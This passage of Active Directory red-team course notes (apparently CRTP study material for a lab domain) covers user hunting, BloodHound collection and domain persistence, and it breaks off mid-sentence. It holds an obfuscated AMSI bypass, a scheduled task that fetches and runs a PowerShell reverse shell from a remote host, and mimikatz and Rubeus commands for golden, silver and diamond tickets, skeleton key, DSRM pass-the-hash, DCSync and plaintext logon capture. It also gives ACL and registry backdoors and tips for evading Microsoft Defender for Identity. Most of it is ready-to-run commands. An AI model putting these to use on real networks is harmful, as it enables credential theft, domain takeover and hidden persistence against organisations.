| 83 | 84 | ## **Solutions** 85 | 86 | **_Coming Soon_** 87 | 88 | > **Note :** In this section, before now, we have only be querying the domain controller for information, No other machine was been communicated to. 89 | 90 | 91 | 92 | 93 | # **Domain Enumeration Cont'd - User Hunting** 94 | 95 | Note that this enumeration is much more more noisy than any we've been doing before now 96 | 97 | 98 | - Find all machines on the current domain where the current user has local admin access 99 | 100 | ```powershell 101 | # powerview 102 | $ Find-LocalAdminAccess -Verbose 103 | ``` 104 | 105 | > **Note :** This function queries the DC of the current or provided domain for a list of computers `(Get-NetComputer)` and then use multi-threaded `Invoke-CheckLocalAdminAccess` on each machine 106 | 107 | **_How It Works -:_** 108 | 109 | ![](https://i.imgur.com/QdFG3nS.png) 110 | 111 | 112 | This can also be done with the help of remote administration tools like **WMI** and **Powershell remoting**. Pretty useful in cases where ports like (RPC and SMB) are disabled, using `Find-LocalAdminAccess` are blocked. we can therefore use `Find-WMILocalAdminAccess.ps1` script. Also make sure to be-careful while running these. 113 | 114 | 115 | - Find local admins on all machines of the domain (needs administrator privileges on non-dc machines) 116 | 117 | 118 | ```powershell 119 | # powerview 120 | $ Invoke-EnumerateLocalAdmin -Verbose 121 | ``` 122 | 123 | 124 | > **Note :** One of the easiest ways of escalating privileges to domain admin is to look for where a machine domain admin token, credential or session is available and we have local admin privileges on that machine 125 | 126 | 127 | - Find computers where a domain admin (or specified user/group) has sessions 128 | 129 | ```powershell 130 | # powerview 131 | $ Invoke-UserHunter 132 | $ Invoke-UserHunter -GroupName "RDPUsers" 133 | ``` 134 | 135 | 136 | - To confirm admin access 137 | 138 | ```powershell 139 | # powerview 140 | $ Invoke-UserHunter -CheckAccess 141 | ``` 142 | 143 | 144 | - Find computers where a domain admin is logged-in 145 | 146 | ```powershell 147 | # powerview 148 | $ Invoke-UserHunter -Stealth 149 | ``` 150 | 151 | **_How it works :_** 152 | 153 | ![](https://i.imgur.com/iXK89et.png) 154 | 155 | 156 | # **Defense** 157 | 158 | 159 | ![](https://i.imgur.com/4gqi52B.png) 160 | 161 | **Make sure to test this out first and see if the organization is okay with it before implementing** 162 | 163 | 164 | -- DONE -- 165 | 166 | 167 | -------------------------------------------------------------------------------- /Domain Enumeration - Part 5.md: -------------------------------------------------------------------------------- 1 | # **Domain Enumeration Cont'd - BloodHound** 2 | 3 | 4 | - Commonly used by penetration testers and Red teamers. 5 | - Provides GUI for AD entities and relationships for the data collected by its ingestors. 6 | - Uses graph Theory for providing the capability of mapping shortest path for interesting things like Domain Admins. 7 | - Bloodhound creates alot of detection if used carelessly 8 | - Supports custom Cipher queries. 9 | 10 | https://github.com/BloodHoundAD/BloodHound 11 | 12 | 13 | ## **Usage** 14 | 15 | - To bypass .NET AMSI just paste in below code on `powershell` 16 | 17 | ```powershell 18 | $ZQCUW = @" 19 | using System; 20 | using System.Runtime.InteropServices; 21 | public class ZQCUW { 22 | [DllImport("kernel32")] 23 | public static extern IntPtr GetProcAddress(IntPtr hModule, string 24 | procName); 25 | [DllImport("kernel32")] 26 | public static extern IntPtr LoadLibrary(string name); 27 | [DllImport("kernel32")] 28 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr 29 | dwSize, uint flNewProtect, out uint lpflOldProtect); 30 | } 31 | "@ 32 | Add-Type $ZQCUW 33 | $BBWHVWQ = 34 | [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('ams 35 | ;i.dll'))") 36 | $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, 37 | "$([systeM.neT.webUtility]::HtMldECoDE('AmsiSca 38 | ;nBuffer'))") 39 | $p = 0 40 | [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p) 41 | $TLML = "0xB8" 42 | $PURX = "0x57" 43 | $YNWL = "0x00" 44 | $RTGX = "0x07" 45 | $XVON = "0x80" 46 | $WRUD = "0xC3" 47 | $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD) 48 | [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6) 49 | ``` 50 | 51 | - Supply data to BloodHound (Remember to bypass .NET AMSI first 🙄) 52 | 53 | ```powershell 54 | . .\SharpHound.ps1 55 | ``` 56 | 57 | - Start BloodHound collector, to gather data 58 | 59 | ```powershell 60 | $ Invoke-BloodHound -CollectionMethod All 61 | 62 | # OR 63 | 64 | $ SharpHound.exe 65 | ``` 66 | 67 | 68 | - Start up the bloodhound GUI also make sure to start up **neo4j** (refer to lab manual 📚 for more info) 69 | 70 | - The generated archive can be uploaded to the BloodHound Application (usually located under `.\BloodHound-master\collectors` directory and it a zip-file(no need to unzip), you can also just do **drag and drop**) 71 | 72 | 73 | - To make BloodHound collection stealthy, use `-stealth` option. (Removes noisy collection methods like RDP, DCOM, PSRemote and LocalAdmin). 74 | 75 | ```powershell 76 | $ Invoke-BloodHound -Stealth 77 | 78 | # OR 79 | 80 | $ SharpHound.exe --stealth 81 | ``` 82 | 83 | - To avoid detections like MDI 84 | 85 | ```powershell 86 | $ Invoke-BloodHound -ExcludeDCs 87 | ``` 88 | 89 | > **Note :** we are not going to shy away from/[ignore] **Microsoft Defender for Identity** (MDI), we might not be worried about **Microsoft Detection Endpoint** (MDE) because they are specific to active directory attacks, we would evade MDI as much as possible. 90 | 91 | 92 | # **Learning Objective 6** 93 | 94 | - Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp domain. 95 | 96 | ## **Solution** 97 | 98 | 99 | **_Coming Soon_** 100 | 101 | 102 | **In other to download a guide to follow, you can use this [book](https://ernw.de/download/BloodHoundWorkshop/ERNW_DogWhispererHandbook.pdf) :** 103 | 104 | > **Note :** For the CRTP exam do not try to setup bloodhound on foothold as it will lead to waste of **time**, setup a bloodhound **GUI** and keep it ready on your Host system so you can transfer to foothold machine. 105 | > Also the older version of BloodHound might just be the best to use because it gives you the privileges to enumerate local admin rights, so try and use that one too. 106 | -------------------------------------------------------------------------------- /Domain Persistence.md: -------------------------------------------------------------------------------- 1 | > **Note -:** You only need a domain admin privileges to set up persistence, while using the persistence you never require the domain admin privileges, although you might sometimes need domain admin privileges to read/write to files. 2 | 3 | 4 | 5 | # **Domain Persistence** 6 | 7 | 8 | - There is much to active directory than "just" the Domain Admin. 9 | - Once we have DA privileges new avenues of persistence, escalation to EA and attacks across trust open up! 10 | 11 | 12 | 13 | # **Kerberos** 14 | 15 | - `Kerberos` is the basis of authentication in a Windows Active Directory environment. 16 | - Clients (programs on behalf of a user) need to obtain tickets from Key Distribution Center (`KDC`) which is a service running on the domain controller. 17 | - These tickets represent the client's credentials.Therefore, `Kerberos` is understandably a very interesting target of abuse! 18 | 19 | 20 | 21 | ![](https://i.imgur.com/lpHU58k.png) 22 | 23 | 24 | 25 | # **Golden Ticket** 26 | 27 | 28 | - A golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket. 29 | - The krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine. 30 | - As a good practice, it is recommended to change the password of the krbtgt account twice as password history is maintained for the account. 31 | 32 | 33 | 34 | 35 | ![](https://i.imgur.com/f4Ti5Jm.png) 36 | 37 | 38 | 39 | 40 | | Options | | 41 | |:-----|:-----| 42 | | kerberos::golden | Name of the module | 43 | | /User:Administrator | Username for which the TGT is generated | 44 | | /domain:dollarcorp.moneycorp.local | Domain FQDN | 45 | | /sid:S-1-5-21-719815819-3726368948-3917688648| SID of the domain | 46 | | /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 | AES256 keys of the krbtgt account. Using AES keys makes the attack more silent. | 47 | | /id:500 /groups:512 | Optional User RID (default 500) and Group default 513 512 520518 519) | 48 | | /ptt | Injects the ticket in current PowerShell process - no need to save the ticket on disk | 49 | | OR | 50 | | /ticket | Saves the ticket to a file for later use | 51 | | /startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future. | 52 | | /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes | 53 | | /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years)in minutes. The default AD setting is 7 days = 100800 | 54 | 55 | 56 | 57 | **_Example Command_ -:** 58 | 59 | - Run the below command to create a Golden ticket on any machine that has network connectivity with DC (You can use the above table to check what each does): 60 | 61 | ```powershell 62 | $ C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 63 | ``` 64 | 65 | 66 | 67 | # **Learning Objective 8** 68 | 69 | - Extra secrets from the domain controller of dollarcorp. 70 | - Using the secrets of `krbtgt` account, create a golden ticket. 71 | - Use the Golden ticket to (once again) get domain admin privileges from a machine 72 | 73 | 74 | ## **Solution** 75 | 76 | 77 | **_Coming Soon_** 78 | 79 | 80 | # **Silver Ticket** 81 | 82 | 83 | - A valid `TGS` (Golden ticket is `TGT`). 84 | - Encrypted and Signed by the hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account. 85 | - Services rarely check `PAC` (Privileged Attribute Certificate). 86 | - Services will allow access only to the services themselves. 87 | - Reasonable persistence period (default 30 days for computer accounts). 88 | 89 | 90 | 91 | 92 | ![](https://i.imgur.com/FIuN49E.png) 93 | 94 | 95 | 96 | 97 | 98 | 99 | | Options | | 100 | |:-----|:-----| 101 | | kerberos::golden | Name of the module (there is no silver module!) | 102 | | /User:Administrator | Username for which the TGT is generated | 103 | | /domain:dollarcorp.moneycorp.local | Domain FQDN | 104 | | /sid:S-1-5-21-719815819-3726368948-3917688648| SID of the domain | 105 | | /target:dcorp-dc.dollarcorp.moneycorp.local | Target server FQDN | 106 | | /service:cifs | The SPN name of service for which TGS is to be created | 107 | | /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 | AES256 keys of the krbtgt account. Using AES keys makes the attack more silent. | 108 | | /id:500 /groups:512 | Optional User RID (default 500) and Group default 513 512 520518 519) | 109 | | /ptt | Injects the ticket in current PowerShell process - no need to save the ticket on disk | 110 | | /startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future. | 111 | | /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes | 112 | | /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years)in minutes. The default AD setting is 7 days = 100800 | 113 | 114 | 115 | **_Example Usage -:_** 116 | 117 | - Using `hash` of the Domain Controller computer account, below command provides access to file system on the DC 118 | 119 | ```powershell 120 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 121 | 122 | # Similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more 123 | ``` 124 | 125 | - There are also various ways of achieving command execution using Silver tickets. 126 | - Create a silver ticket for the **HOST SPN** which will allow us to schedule a task on the target: 127 | 128 | 129 | 130 | ```powershell 131 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 132 | ``` 133 | 134 | 135 | 136 | Schedule and execute a task - noisy but fine for PoC :) 137 | 138 | 139 | 140 | ```powershell 141 | $ schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.1:8080/Invoke-PowerShellTcp.ps1''')'" 142 | ``` 143 | 144 | 145 | # **Learning Objective 9** 146 | 147 | 148 | - [ ] During the additional lab time: 149 | - Try to get command execution on the domain controller by creating silver tickets for: 150 | - HOST service 151 | - WMI 152 | 153 | 154 | 155 | ## **Solution** 156 | 157 | 158 | **_Coming Soon_** 159 | 160 | 161 | 162 | > In case of Golden ticket we forge a `TGT`, in case of Silver ticket we forge a Service ticket or a `TGS` 163 | 164 | 165 | 166 | 167 | # **Diamond Ticket** 168 | 169 | 170 | - A diamond ticket is created by decrypting a valid `TGT`, making changes to it and re-encrypt it using the `AES` keys of the krbtgt account. 171 | - Golden ticket was a `TGT` forging attacks whereas diamond ticket is a `TGT` modification attack. 172 | - Once again, the persistence lifetime depends on krbtgt account. 173 | - A diamond ticket is more opsec safe as it has: 174 | - Valid ticket times because a `TGT` issued by the DC is modified 175 | - In golden ticket, there is no corresponding `TGT` request for TGS/Service ticket requests as the `TGT` is forged. 176 | - A diamond ticket should be chosen over a golden ticket in a real assessment. 177 | 178 | 179 | > In **Golden tickets** we forge a `TGT`, in **Diamond ticket** we open it up (decrypt), make changes and re-encrypt it 180 | 181 | 182 | **_Example Usage -:_** 183 | 184 | 185 | - We would still need `krbtgt AES keys`. Use the following `Rubeus` command to create a diamond ticket (note that `RC4` or `AES` keys of the user can be used too): 186 | 187 | 188 | ```powershell 189 | Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:studentx /password:StudentxPassword /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 190 | ``` 191 | 192 | 193 | 194 | - We could also use `/tgtdeleg` option in place of credentials in case we have access as a domain user: 195 | 196 | 197 | ```powershell 198 | Rubeus.exe diamond 199 | /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 200 | ``` 201 | 202 | # **Learning Objective 10** 203 | 204 | 205 | - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack. 206 | 207 | 208 | 209 | ## **Solution** 210 | 211 | 212 | **_Coming Soon_** 213 | 214 | 215 | 216 | # **Skeleton Key** 217 | 218 | 219 | - Skeleton key is a persistence technique where it is possible to patch a Domain Controller (lsass process) so that it allows access as any user with a single password. 220 | - The attack was discovered by Dell Secureworks used in a malware named the Skeleton Key malware. 221 | - All the publicly known methods are NOT persistent across reboots.Yet again, mimikatz to the rescue. 222 | 223 | 224 | **_Example Usage -:_** 225 | 226 | - Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required 227 | 228 | 229 | ```powershell 230 | Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local 231 | ``` 232 | 233 | 234 | 235 | - Now, it is possible to access any machine with a valid username and password as "mimikatz" 236 | 237 | 238 | 239 | ```powershell 240 | Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator 241 | ``` 242 | 243 | 244 | > Note that Skeleton Key is not opsec safe and is also known to cause issues with AD CS. 245 | 246 | 247 | - In case lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target 248 | 249 | - DC: 250 | 251 | 252 | ``` 253 | mimikatz # privilege::debug 254 | mimikatz # !+ 255 | mimikatz # !processprotect /process:lsass.exe /remove 256 | mimikatz # misc::skeleton 257 | mimikatz # !- 258 | ``` 259 | 260 | 261 | 262 | - Note that above would be very noisy in logs - Service installation (Kernel mode driver) 263 | 264 | 265 | 266 | # **DSRM** 267 | 268 | - DSRM is Directory Services Restore Mode. 269 | - There is a local administrator on every DC called "Administrator" whose password is the DSRM password. 270 | - DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed. 271 | - After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC. 272 | 273 | 274 | 275 | ![](https://i.imgur.com/05CvCxs.png) 276 | 277 | 278 | **_Example Usage -:_** 279 | 280 | 281 | - Dump DSRM password (needs DA privs) 282 | 283 | ```powershell 284 | Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc 285 | ``` 286 | 287 | - Compare the Administrator hash with the Administrator hash of below command 288 | 289 | ```powershell 290 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc 291 | ``` 292 | 293 | - First one is the DSRM local Administrator. 294 | 295 | --- 296 | 297 | - Since it is the local administrator of the DC, we can also pass the hash to authenticate. 298 | - But, the Logon Behavior for the DSRM account needs to be changed before we can use its hash. 299 | 300 | ```powershell 301 | Enter-PSSession -Computername dcorp-dc 302 | New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD 303 | ``` 304 | 305 | 306 | 307 | - Then use the below command to pass the hash 308 | 309 | 310 | ```powershell 311 | $ Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' 312 | 313 | $ ls \\dcorp-dc\C$ 314 | ``` 315 | 316 | 317 | 318 | # **Learning Objective 11** 319 | 320 | 321 | - During additional lab time: 322 | - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence. 323 | 324 | 325 | 326 | ## **Solution** 327 | 328 | 329 | **_Coming Soon_** 330 | 331 | 332 | 333 | # **Custom SSP** 334 | 335 | - A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are 336 | 337 | - NTLM 338 | - Kerberos 339 | - Wdigest 340 | - CredSSP 341 | 342 | - Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server. 343 | 344 | 345 | **_Examples -:_** 346 | 347 | 348 | - [ ] We can use either of the ways: 349 | 350 | - Drop the mimilib.dll to system32 and add mimilib to `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security` Packages: 351 | 352 | ```powershell 353 | $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 354 | 'Security Packages' -Value $packages 355 | ``` 356 | 357 | 358 | - Using mimikatz, inject into lsass (Not super stable with Server 2019 and Server 2022 but still usable): 359 | 360 | ```powershell 361 | Invoke-Mimikatz -Command '"misc::memssp"' 362 | ``` 363 | 364 | All local logons on the DC are now logged to `C:\Windows\system32\mimilsa.log` 365 | 366 | 367 | ![](https://i.imgur.com/87AenfB.png) 368 | 369 | 370 | > **Note -:** As said in the beginning, you will need domain admin privileges to read the dump passwords in clear text, however we can still read this files without privileges by making sure that credentials are dropped to `C:\Windows\SYSVOL`, It consists of the domain public files that need to be accessed by clients and kept synced between DCs, it is also world writable and readable, so we can find a way to compile our own mimikatz and make minor changes to this module to save the file in the `SYSVOL` directory as specified earlier 371 | 372 | 373 | # **Using ACLs - AdminSDHolder** 374 | 375 | 376 | - Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups (called Protected Groups). 377 | 378 | - Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL. 379 | 380 | - Protected Groups 381 | 382 | 383 | 384 | 385 | | | | 386 | |:-----|:-----| 387 | | Account Operators | Enterprise Admins | 388 | | Backup Operators | Domain Controllers | 389 | | Server Operators | Read-only Domain Controllers | 390 | | Print Operators | Schema Admins | 391 | | Domain Admins | Administrators | 392 | | Replicator | | 393 | 394 | 395 | 396 | - Well known abuse of some of the Protected Groups - All of the below can log on locally to DC 397 | 398 | 399 | 400 | | | | 401 | |:-----|:-----| 402 | | Account Operators | Cannot modify DA/EA/BA groups. Can modify nested group within these groups. | 403 | | Backup Operators | Backup GPO, edit to add SID of controlled account to a privileged group and Restore. | 404 | | Server Operators | Run a command as system (using the disabled Browser service) | 405 | | Print Operators | Copy ntds.dit backup, load device drivers. | 406 | 407 | 408 | 409 | - With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. 410 | - In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it. 411 | 412 | 413 | **_Example -:_** 414 | 415 | 416 | 417 | - Add FullControl permissions for a user to the AdminSDHolder using `PowerView` as DA: 418 | 419 | 420 | ```powershell 421 | # Powerview 422 | 423 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 - Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 424 | ``` 425 | 426 | 427 | 428 | - Using ActiveDirectory Module and RACE toolkit (https://github.com/samratashok/RACE) : 429 | 430 | 431 | 432 | 433 | ```powershell 434 | 435 | Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 - 436 | Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose 437 | ``` 438 | 439 | 440 | 441 | - Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder,: 442 | 443 | ```powershell 444 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 445 | ``` 446 | 447 | 448 | 449 | ```powershell 450 | Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 451 | ``` 452 | 453 | 454 | - Run SDProp manually using Invoke-SDPropagator.ps1 from Tools directory to make any of the above command take effect: 455 | 456 | 457 | 458 | ```powershell 459 | Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose 460 | ``` 461 | 462 | 463 | - For pre-Server 2008 machines: 464 | 465 | 466 | ```powershell 467 | Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose 468 | ``` 469 | 470 | 471 | 472 | **_More Examples - :_** 473 | 474 | 475 | - Check the **Domain Admins permission** - `PowerView` as normal user: 476 | 477 | 478 | ```powershell 479 | Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"} 480 | ``` 481 | 482 | 483 | - Using `ActiveDirectory Module`: 484 | 485 | ```powershell 486 | (Get-Acl -Path 'AD:\CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'} 487 | ``` 488 | 489 | 490 | - Abusing **Full-control** using `PowerView`: 491 | 492 | 493 | ```powershell 494 | Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose 495 | ``` 496 | 497 | 498 | 499 | - Using `ActiveDirectory Module`: 500 | 501 | 502 | 503 | ```powershell 504 | Add-ADGroupMember -Identity 'Domain Admins' -Members testda 505 | ``` 506 | 507 | 508 | 509 | - Abusing **ResetPassword** using `PowerView`: 510 | 511 | 512 | 513 | ```powershell 514 | Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose 515 | ``` 516 | 517 | 518 | - Using `ActiveDirectory Module`: 519 | 520 | 521 | 522 | ```powershell 523 | Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose 524 | ``` 525 | 526 | 527 | 528 | - Add **Full Control** rights, `Powerview`: 529 | 530 | 531 | ```powershell 532 | Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 533 | ``` 534 | 535 | 536 | 537 | 538 | - Using` ActiveDirectory Module` and `RACE`: 539 | 540 | 541 | 542 | ```powershell 543 | Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose 544 | ``` 545 | 546 | 547 | 548 | - Add rights for DCSync: 549 | 550 | 551 | 552 | ```powershell 553 | Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose 554 | ``` 555 | 556 | 557 | - Using ActiveDirectory Module and RACE: 558 | 559 | 560 | ```powershell 561 | Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose 562 | ``` 563 | 564 | 565 | Execute DCSync: 566 | 567 | 568 | ```powershell 569 | Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' 570 | ``` 571 | 572 | 573 | or 574 | 575 | ```powershell 576 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 577 | ``` 578 | 579 | 580 | 581 | 582 | # **Learning Objective 12** 583 | 584 | 585 | - Check if studentx has Replication (DCSync) rights. 586 | - If yes, execute the DCSync attack to pull hashes of the krbtgt user. 587 | - If no, add the replication rights for the studentx and execute the DCSync attack to pull hashes of the krbtgt user. 588 | 589 | 590 | ## **Solution** 591 | 592 | 593 | 594 | **_Coming Soon_** 595 | 596 | 597 | 598 | # **Using ACLs - Security Descriptors - WMI** 599 | 600 | 601 | - ACLs can be modified to allow non-admin users access to securable objects. Using the RACE toolkit: 602 | 603 | 604 | 605 | ```powershell 606 | # First of all run (to import RACE Toolikit) -: 607 | 608 | C:\AD\Tools\RACE-master\RACE.ps1 609 | 610 | #• On local machine for student1: 611 | 612 | Set-RemoteWMI -SamAccountName student1 -Verbose 613 | 614 | #• On remote machine for student1 without explicit credentials: 615 | 616 | Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose 617 | 618 | #• On remote machine with explicit credentials. Only root\cimv2 and nested namespaces: 619 | 620 | Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose 621 | 622 | #• On remote machine remove permissions: 623 | 624 | Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc-namespace 'root\cimv2' -Remove -Verbose 625 | ``` 626 | 627 | 628 | **Example** 629 | 630 | - After running the 2nd payload as shown above we can use `gwmi` to check for information on the DC 631 | 632 | 633 | ![](https://i.imgur.com/WNWRJR1.png) 634 | 635 | 636 | 637 | # **Using ACLs - Security Descriptors - PowerShell Remoting** 638 | 639 | 640 | - Using the RACE toolkit - PS Remoting backdoor not stable after August 2020 patches -: 641 | 642 | 643 | 644 | ```powershell 645 | # First of all run (to import RACE Toolikit) -: 646 | 647 | C:\AD\Tools\RACE-master\RACE.ps1 648 | 649 | #• On local machine for student1: 650 | 651 | Set-RemotePSRemoting -SamAccountName student1 -Verbose 652 | 653 | #• On remote machine for student1 without credentials: 654 | 655 | Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose 656 | 657 | #• On remote machine, remove the permissions: 658 | 659 | Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove 660 | ``` 661 | 662 | 663 | - We can then run - `Enter-PSSession dcorp-dc` - to gain interactive shell as DA but with still user rights, NO advanced Privileges. 664 | - What we can therefore do here is to enumerate for credentials, stored `.TXT` files, scripts or even backup `NTDS.dit`, sometimes always stored under the `C:\` base directory 665 | 666 | 667 | # **Using ACLs - Security Descriptors - Remote Registry** 668 | 669 | 670 | - Using `RACE` or DAMP, with admin privs on remote machine (Make sure to run this first) -: 671 | 672 | ```powershell 673 | Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose 674 | ``` 675 | 676 | - As student1, retrieve machine account hash: 677 | 678 | ```powershell 679 | Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose 680 | ``` 681 | 682 | - Retrieve local account hash: 683 | 684 | ```powershell 685 | Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose 686 | ``` 687 | 688 | - Retrieve domain cached credentials: 689 | 690 | ```powershell 691 | Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose 692 | ``` 693 | 694 | > We can then **optionally** craft a silver ticket, using the `RPCSS` service to get shell as domain controller 695 | 696 | # **Learning Objective 13** 697 | 698 | 699 | - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. 700 | - Retrieve machine account hash from dcorp-dc without using administrator access and use that 